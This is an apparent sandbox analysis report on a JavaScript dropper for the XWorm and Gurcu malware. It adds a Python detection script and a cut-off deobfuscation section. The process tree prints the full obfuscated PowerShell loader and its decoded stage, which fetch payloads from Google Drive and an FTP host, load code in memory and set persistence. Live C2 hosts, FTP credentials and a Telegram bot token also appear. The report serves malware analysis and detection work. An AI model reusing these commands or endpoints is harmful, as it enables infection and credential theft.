Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20-09-2024 20:53

General

  • Target

    MOT-DE-PASSE.js

  • Size

    24KB

  • MD5

    3568415c8644c0e6a231927bb26c3307

  • SHA1

    3cdece2baabd90c46b4b10d8fc14dfbbc7352651

  • SHA256

    914710d214497ca13da8f3ce50aae097c508ac9b45596c1728404a5a85258622

  • SHA512

    465238863185d29bede8da70f823d1ac78874768962a726b1262f65411547cd9d2502d78ea5633642b2a26cbeb754ea1c174d4fcf0229d99035fd5c0a98227fe

  • SSDEEP

    768:mUj6N48QwfUtVRd64neTcgc0N4DnW2N2Tcc4Hg/0IeSpQYQBcRRuv1mcifM+oQ4a:AfGefZD/MFiZ

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs
    exe.dropper: https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol
    ftp
  • Host
    ftp.desckvbrat.com.br
  • Port
    21
  • Username
    desckvbrat1
  • Password
    developerpro21578Jp@@

Extracted

  • Family
    xworm
  • Version
    5.0
  • C2
    moneyluckwork.ddns.net:7000
    moneyluck.duckdns.org:7000
  • Mutex
    gGehVFEiZl8AfiDz
  • Attributes
    • install_file
      USB.exe
    • telegram
      https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887
    • aes.plain

Extracted

  • Family
    gurcu
  • C2
    https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copy of, a web browser credential store.

  • Blocklisted process makes network request 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Uses powershell.exe to run commands.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
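The signatures above describe the chain behaviourally. The Python below is an added example, not anything produced by the sandbox, that turns the same observations into process-creation checks a SOC could run over Sysmon EID 1 or Security 4688 records: a script host spawning PowerShell, an obfuscated PowerShell command line, TLS certificate validation switched off, an in-memory assembly load, a .NET utility started by PowerShell with an empty command line (the hollowing target implied by SetThreadContext and WriteProcessMemory), and deletion of the script that started the chain. The events are constructed to mirror this report's process tree with shortened command lines, plus one benign control that must not fire; the field names are the generic ones a process-creation record provides.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields Sysmon EID 1 / Security 4688 carry)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# .NET utilities that loaders start with an empty command line as hollowing targets
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
# two or more of these in one PowerShell command line is a strong obfuscation signal
OBFUSCATION_MARKERS = ("[char]", "frombase64string", "::unicode.getstring", ".replace(")
SCRIPT_EXT_RE = re.compile(r'[^\s"]+\.(?:js|jse|vbs|vbe|wsf)\b', re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_chain(events):
    """Map pid -> sorted labels for every event that matches part of the chain."""
    by_pid = {e.pid: e for e in events}
    # scripts launched by a script host; a later 'del' of one of them is self-cleanup
    dropper_scripts = {
        p.lower()
        for e in events if basename(e.image) in SCRIPT_HOSTS
        for p in SCRIPT_EXT_RE.findall(e.cmdline)
    }
    findings = defaultdict(list)
    for e in events:
        img, cl = basename(e.image), e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        parent_img = basename(parent.image) if parent else ""
        if img in POWERSHELL:
            if parent_img in SCRIPT_HOSTS:
                findings[e.pid].append("script-host-to-powershell")
            if sum(m in cl for m in OBFUSCATION_MARKERS) >= 2:
                findings[e.pid].append("obfuscated-powershell")
            if "servercertificatevalidationcallback" in cl:
                findings[e.pid].append("tls-validation-disabled")
            if "currentdomain.load(" in cl or "reflection.assembly]::load(" in cl:
                findings[e.pid].append("in-memory-assembly-load")
        # a .NET host whose whole command line is its own path has nothing legitimate to do
        if (img in DOTNET_HOSTS and parent_img in POWERSHELL
                and basename(e.cmdline.strip().strip('"')) == img):
            findings[e.pid].append("dotnet-host-without-args")
        if (img == "cmd.exe" and re.search(r"\bdel\b", cl)
                and any(s in cl for s in dropper_scripts)):
            findings[e.pid].append("dropper-self-delete")
    return {pid: sorted(labels) for pid, labels in findings.items()}


# Constructed events mirroring the process tree in this report (PIDs as reported,
# command lines shortened); the last one is a benign control that must not fire.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(1492, 1000, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js"),
    ProcEvent(4356, 1492, PS,
              "powershell.exe -command $f = 'JA' + [char]66 + 'UAFEATQ';"
              "$f = [System.Convert]::FromBase64String($f);"
              "$f = [System.Text.Encoding]::Unicode.GetString($f);powershell $f"),
    ProcEvent(4744, 4356, PS,
              'powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback'
              " = {$true};[System.AppDomain]::CurrentDomain.Load( $b ).GetType( 'ClassLibrary3.Class1' )"
              ".GetMethod( 'prFVI' ).Invoke($null, $a)\""),
    ProcEvent(1048, 4744, PS,
              r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\wpnoa.ps1"'),
    ProcEvent(4812, 1048, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    ProcEvent(3592, 4744, r"C:\Windows\SYSTEM32\cmd.exe",
              r'cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js"'),
    ProcEvent(7001, 1000, PS, r"powershell.exe -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for pid, labels in sorted(detect_chain(EVENTS).items()):
        print(pid, ", ".join(labels))
```

Each check is weak on its own (administrators do run PowerShell from scripts, and RegAsm.exe is a signed Microsoft binary); the value is in correlating them along one parent-child chain, which is why the function keys its findings by PID and resolves parents from the same event set rather than alerting on isolated command lines.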

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA' + [char]66 + 'UAFEATQ' + [char]66 + 'kAEYAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAVA' + [char]66 + 'RAE0AZA' + [char]66 + 'GACAAKQAgAHsAJA' + [char]66 + 'NAGkAUg' + [char]66 + 'JAGQAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAKQAgAHsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAKAAkAFIAWQ' + [char]66 + 'FAGEARgAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + 
[char]66 + 'lACAAewAkAFIAWQ' + [char]66 + 'FAGEARgAgAD0AIAAoACQAUg' + [char]66 + 'ZAEUAYQ' + [char]66 + 'GACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAVQ' + [char]66 + 'SAEwASw' + [char]66 + 'CACwAIAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApACAAOwAkAEEAVQ' + [char]66 + 'yAEcARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 'AFEAIAA9ACAAKAAgACQATQ' + [char]66 + 'pAFIASQ' + [char]66 + 'kACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 
'AFEAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAQQ' + [char]66 + 'VAHIARw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + 
'0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' + [char]66 + 'hAG4AYQ' + [char]66 + 'nAGUAcg' + [char]66 + 'dADoAOg' + [char]66 + 'TAGUAYw' + [char]66 + '1AHIAaQ' + [char]66 + '0AHkAUA' + [char]66 + 'yAG8AdA' + [char]66 + 'vAGMAbw' + [char]66 + 'sACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAVA' + [char]66 + '5AHAAZQ' + [char]66 + 'dADoAOg' + [char]66 + 'UAGwAcwAxADIAOwAkAGgAcA' + [char]66 + '4AGUAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'UAGUAeA' + [char]66 + '0AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nAF0AOgA6AFUAVA' + [char]66 + 'GADgAOwAkAGgAcA' + [char]66 + '4AGUALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACcAZA' + [char]66 + 'lAHYAZQ' + [char]66 + 'sAG8AcA' + [char]66 + 'lAHIAcA' + [char]66 + 'yAG8AMgAxADUANwA4AEoAcA' + [char]66 + 'AAEAAJwApADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + 
[char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAnAGYAdA' + [char]66 + 'wADoALwAvAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQAMQ' + [char]66 + 'AAGYAdA' + [char]66 + 'wAC4AZA' + [char]66 + 'lAHMAYw' + [char]66 + 'rAHYAYg' + [char]66 + 'yAGEAdAAuAGMAbw' + [char]66 + 'tAC4AYg' + [char]66 + 'yAC8AVQ' + [char]66 + 'wAGMAcg' + [char]66 + '5AHAAdA' + [char]66 + 'lAHIALwAwADIALw' + [char]66 + 'EAEwATAAwADEALg' + [char]66 + '0AHgAdAAnACAAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAGQAaQ' + [char]66 + 'zAHAAbw' + [char]66 + 'zAGUAKAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lACAAPQAgACgATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAgACkAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + 
'0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgACkALg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAHkAcA' + [char]66 + 'lACgAIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnAHAAcg' + [char]66 + 'GAFYASQAnACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcASw' + [char]66 + 'RAGQAVg' + [char]66 + 'jADYARwA2AC8Adw' + [char]66 + 'hAHIALw' + [char]66 + 'tAG8AYwAuAG4AaQ' + [char]66 + 'iAGUAdA' + [char]66 + 'zAGEAcAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgACwAIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAsACAAJw' + [char]66 + '0AHIAdQ' + [char]66 + 'lACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js') ;powershell $fLbjh
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4356
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$TQMdF = $host.Version.Major.Equals(2);If ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = ( New-Object Net.WebClient ) ;$yHJhx.Encoding = [System.Text.Encoding]::UTF8 ;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$hpxe.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$VtaAF = $hpxe.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/02/DLL01.txt' );$hpxe.dispose();$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $hpxe.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'KQdVc6G6/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js', 'true' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
          4⤵
          • Adds Run key to start application
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\wpnoa.ps1"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4812
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js"
          4⤵
            PID:3592
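The stage-1 command line above is the loader's only real obfuscation: a base64 blob split into single-quoted chunks with every `B` written as `[char]66`, a `.replace('㍿','B')` that is a no-op on this blob, base64 and UTF-16LE (`Encoding::Unicode`) decoding, and finally substitution of the dropper's on-disk path for the `%DCPJU%` placeholder. The Python below is an added example, not part of the sandbox report, that reproduces those steps statically so the second stage can be read without executing anything, and also recovers the two values stage 2 keeps out of plain sight (the FTP username spelled out as a char array and the C2 URL stored backwards). Its sample inputs are constructed from the command lines shown in the process tree: the first nine chunks of the stage-1 expression, cut at a base64 group boundary so they decode to the opening statement of 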